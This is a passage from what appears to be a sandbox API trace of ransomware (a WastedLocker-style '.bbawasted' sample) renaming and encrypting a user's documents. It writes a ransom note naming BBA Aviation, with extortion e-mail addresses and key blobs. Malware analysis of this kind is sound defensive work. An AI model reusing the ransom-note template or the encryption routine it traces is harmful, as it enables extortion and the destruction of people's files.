hHeap=0x660000) returned 1 [0217.121] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0217.122] SetEndOfFile (hFile=0x28c) returned 1 [0217.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0217.124] CloseHandle (hObject=0x28c) returned 1 [0217.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0217.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa308 | out: hHeap=0x660000) returned 1 [0217.124] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a61b8) returned 1 [0217.125] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0217.125] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0217.125] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\jUWRIQHH\\xmOV.doc") returned 52 [0217.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x272) returned 0x6aecf0 [0217.125] lstrcpyW (in: lpString1=0x6aed58, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0217.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0217.125] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6818) returned 1 [0217.126] CryptGenRandom (in: hProv=0x6a6818, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0217.126] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0217.126] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\jUWRIQHH\\xmOV.doc.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\juwriqhh\\xmov.doc.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0217.426] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0217.428] SetEndOfFile (hFile=0x28c) returned 1 [0217.428] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0217.428] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0217.428] lstrcpyW (in: lpString1=0x6aed58, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0217.428] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\jUWRIQHH\\xmOV.doc" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\juwriqhh\\xmov.doc"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\jUWRIQHH\\xmOV.doc.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\juwriqhh\\xmov.doc.bbawasted")) returned 1 [0217.429] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\jUWRIQHH\\xmOV.doc.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\juwriqhh\\xmov.doc.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0217.430] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0217.430] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x1970 [0217.430] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1970) returned 0x5f0000 [0217.430] CloseHandle (hObject=0x294) returned 1 [0217.431] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0217.431] CloseHandle (hObject=0x290) returned 1 [0217.431] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6b6398 [0217.431] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6790) returned 1 [0217.432] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x1b8, pbBuffer=0x6b63e0 | out: pbBuffer=0x6b63e0) returned 1 [0217.432] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0217.432] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a65f8) returned 1 [0217.433] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0217.433] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0217.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0217.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b6398 | out: hHeap=0x660000) returned 1 [0217.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0217.444] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]k/jUaUB9umr/IPgsUomySHHVkugh+Q3yH1MJAbgtcHnMtgz5ADag5+7K2pksq1t9\r\nFN7oHcB+D3edxcEzEs5Qi3VPokBTVLS1sddeTiN9f0oCchg7Hyh0reoNXQKN6aO/\r\nkZQt29WyABkZL4SsG3b9nUarwv+CLMrVE376uuSD1sfobGA4cVbbvLee29NRf9zS\r\nDcgNRtVnPrcEOoIN2NYPVfiM280v42LJRaU8QnZ2zpaujljy3zl5B0V/kzjZl4OT\r\nhERdO+OZsM0Vm2nF/vRd+POLndlcyeITZj/sN7NWcyX9h7+YK6oPB+thY8yOdN1h\r\nIYNzHVA9u4Qg3XPX3rOByMTZughE5CicxiWzQKLTM/JQO1IpvnX7zT0jS1TyE6ja\r\nHI2dcC7RU2l+b/2fC6ziP78UJB7GHJzfo2YsQBZ8e5QV3WnRjH/ieLcgwdiQy0md\r\n5aUeL2IIpI4Zqfal3cTN8JkfWP2/MP7KsBZutKmmj/EHWewveFilh2/X05s7nVMR\r\nKhimhBTsbg4mDXjOUl/dqc6CTLihvDdlrwEKZUXj5+5KfPaAKCJCbsQIKtxQz/Qa\r\nqUZcj4zTVU3YMXRiAqgUrhA11SgMBvI43DRdFdJWdRMnZZZlLf7x5aTa/cAkD6su\r\nYMCfViT+6tBRbv5WN3f7P3YsHsYEPhDDrwHlqD6HNFG=[end_key]\r\nKEEP IT\r\n") returned 984 [0217.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0217.444] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0217.445] SetEndOfFile (hFile=0x28c) returned 1 [0217.447] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0217.447] CloseHandle (hObject=0x28c) returned 1 [0217.448] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0217.448] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b0588 | out: hHeap=0x660000) returned 1 [0217.448] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6460) returned 1 [0217.449] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0217.449] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0217.449] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SkQOTX6.pptx") returned 47 [0217.449] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x268) returned 0x6adb18 [0217.449] lstrcpyW (in: lpString1=0x6adb76, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0217.449] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0217.449] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a69b0) returned 1 [0217.450] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0217.450] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0217.450] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SkQOTX6.pptx.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\skqotx6.pptx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0217.450] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0217.452] SetEndOfFile (hFile=0x28c) returned 1 [0217.452] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0217.452] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0217.452] lstrcpyW (in: lpString1=0x6adb76, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0217.452] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SkQOTX6.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\skqotx6.pptx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SkQOTX6.pptx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\skqotx6.pptx.bbawasted")) returned 1 [0217.453] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SkQOTX6.pptx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\skqotx6.pptx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0217.453] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0217.454] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x117f3 [0217.454] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x117f3) returned 0x5f0000 [0217.454] CloseHandle (hObject=0x290) returned 1 [0217.456] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0217.458] CloseHandle (hObject=0x294) returned 1 [0217.458] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6b6398 [0217.458] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6680) returned 1 [0217.458] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x1b8, pbBuffer=0x6b63e0 | out: pbBuffer=0x6b63e0) returned 1 [0217.458] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0217.458] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a5f98) returned 1 [0217.459] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0217.459] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0217.468] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0217.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b6398 | out: hHeap=0x660000) returned 1 [0217.468] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0217.468] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ExKjzVKwH+YWEg+hFuCLj/KVJkn6wW2H268IzHKppxl7i/OWYwGY8HkolO4lw9Oc\r\nPYGrZeuPwvA3JXILr6XouTT8YCx4/P/BFwetAZvdHkYNuMRSnD3rgfz3VmcW5k8s\r\nJCXyWx8kZiQYp59iIwxco0PNK/Txt4ycgNmclF33DEgaRfne3+AkEzblFgR3/d1d\r\nnVp/Sp9yImC7bHf3aglnOeyqMee8ui6m6hV5Jxb+5fvF0bAYS397QR+gMQT54Ao3\r\nAxcUtGVQzvXB6o6/+1dxYVEuzO3lin8vW8WyGW7dB7MuCB94X604XPvR2ZXXltGb\r\nvQEHdM9vbHJY6uFMY4yFFbkHaxldv2ZPTUk7rg+DF3gkEsn3zfRxjs3iOh92xeML\r\nVdWa0wjq7wmwFIDrJblbnF68YwoBndDcMASlC21RZl0p+rDmZa7YeqQlduB5AlzD\r\n+24mzQKHbu+dLzXINuQLoeduqSVXOTsRfWr70tTVFMtCIoX+ji2FsIrXJe7iMbwT\r\nx8cLTRUzUDoWZZF1M1jeWP6JBYSYlE3S6fVHRUOQOobui+on3CJLwTTk6rsxlqFS\r\nYPtPNwf2uoUTSpJ5UjLJDjyJ1KW3/+9mtZp8fO6uxtTvADWhO/8+cID3Unoyw0jf\r\nF4Ga+kyp59azXhwvTvSweSWV9XO2UAXmtxjG7NBY0rB=[end_key]\r\nKEEP IT\r\n") returned 984 [0217.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0217.469] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0217.469] SetEndOfFile (hFile=0x28c) returned 1 [0217.471] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0217.471] CloseHandle (hObject=0x28c) returned 1 [0217.471] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0217.472] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6afaf0 | out: hHeap=0x660000) returned 1 [0217.472] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6460) returned 1 [0217.472] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0217.472] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0217.472] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\e K1_sdDsl-Jevwd.ots") returned 64 [0217.472] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x28a) returned 0x6aecf0 [0217.472] lstrcpyW (in: lpString1=0x6aed70, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0217.473] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0217.473] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a63d8) returned 1 [0217.770] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0217.770] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0217.770] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\e K1_sdDsl-Jevwd.ots.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\szvkrvc\\e k1_sddsl-jevwd.ots.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0217.772] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0217.773] SetEndOfFile (hFile=0x28c) returned 1 [0217.773] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0217.773] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0217.773] lstrcpyW (in: lpString1=0x6aed70, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0217.773] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\e K1_sdDsl-Jevwd.ots" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\szvkrvc\\e k1_sddsl-jevwd.ots"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\e K1_sdDsl-Jevwd.ots.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\szvkrvc\\e k1_sddsl-jevwd.ots.bbawasted")) returned 1 [0217.774] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\e K1_sdDsl-Jevwd.ots.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\szvkrvc\\e k1_sddsl-jevwd.ots.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0217.774] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0217.774] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x12121 [0217.775] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12121) returned 0x5f0000 [0217.775] CloseHandle (hObject=0x294) returned 1 [0217.777] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0217.778] CloseHandle (hObject=0x290) returned 1 [0217.778] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0217.778] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6c58) returned 1 [0217.778] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0217.778] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0217.778] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6ce0) returned 1 [0217.779] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0217.779] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0217.788] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0217.788] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0217.788] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0217.788] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Yd+Cd+wkXNYcAe0Y2d29rpRS1ijzBwzQy0O/JiAhF4vmZTrK+trkVr9TIowj3UBu\r\nXucEZ3wMfOXoPCy/eGacqRh4qsm/ZkEp2P0qrxfDUBZ5il8zRZ8d+hVcUsVIIMEB\r\ng5Wyi0XRrcxhCt7rb33B2JLOpyYgGnEJ3C8o+lNUqs5awbABPAh6hW6rL1xoUymG\r\nY0xFNdspVx3co9Icsegs/1NTkLf/lsR3ROjg8LdjycOVtdgqXibl/Bc4pUWyXrZ0\r\nB87ngPFXSrllfSc4psM32X5o8RIu4hLRRFbJ2fV5NfbGW5F53YeuyNCBXKQY3XLl\r\nsVEZDErfAjHhHZXompswHinNsM0n/38nnUMOv/UCpv/mb7+VTWyXONZYlmCBIrI8\r\nilpmum9QoUBmcnAp/VhbIgXygDCzjd+lW0Zb2Ym237v0RwJzqCtcbHq4UTHPjVwB\r\nBboBKyOFyLxCU19EVWqwOZq+C96qSPPBO9NdOoS9vjDShEecxTp90WqS6cgOC4DS\r\nTEFffJ4zLHG6TvsY61rvGA1VNDKyyOm8HlTT9wFTBVm7jDni3kgRoVwyL/DcXACq\r\nIyI4ZRlBpSp4CDfFdrwsXhINZt3PAdi/6qHY7+5wIYkrsc/5Lz0aeILITCHGc99H\r\n+7s77MFpfbCfKEnWrdJng0joa9B1D5hkvVTiYVnoBwP=[end_key]\r\nKEEP IT\r\n") returned 984 [0217.788] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0217.788] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0217.789] SetEndOfFile (hFile=0x28c) returned 1 [0217.791] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0217.791] CloseHandle (hObject=0x28c) returned 1 [0217.791] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0217.791] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b66a0 | out: hHeap=0x660000) returned 1 [0217.791] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6708) returned 1 [0217.792] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0217.792] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0217.792] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\qLI28.pptx") returned 53 [0217.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x274) returned 0x6c4b88 [0217.792] lstrcpyW (in: lpString1=0x6c4bf2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0217.792] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0217.792] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6928) returned 1 [0217.793] CryptGenRandom (in: hProv=0x6a6928, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0217.793] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0217.793] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\pH3m\\SzVKRvC\\qLI28.pptx.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\ph3m\\szvkrvc\\qli28.pptx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 